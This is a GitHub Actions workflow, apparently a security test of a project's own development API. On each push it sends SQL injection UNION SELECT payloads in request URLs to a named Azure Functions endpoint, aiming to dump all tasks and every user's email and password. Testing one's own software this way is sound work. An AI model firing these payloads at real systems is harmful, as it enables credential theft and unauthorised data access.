name: SQL-INJECTION-TEST-USERSID-TASKID
on: [push]

jobs:
  injection-test:
    name: SQL Injection Test
    runs-on: ubuntu-latest

    steps:
      - name: Get Sources
        uses: actions/checkout@v2
      - name: GET All users and tasks
        uses: satak/webrequest-action@master
        with:
          url: 'https://nsc-func-dev-usw2-tuesday.azurewebsites.net/api/users/14641 UNION SELECT taskId, taskUserId, title, taskDescription FROM tasks/tasks'
          method: GET
      - name: GET All users, email and password
        uses: satak/webrequest-action@master
        with:
          url: 'https://nsc-func-dev-usw2-tuesday.azurewebsites.net/api/users/14641 UNION select userid, userid, email, userpassword from users/tasks'
          method: GET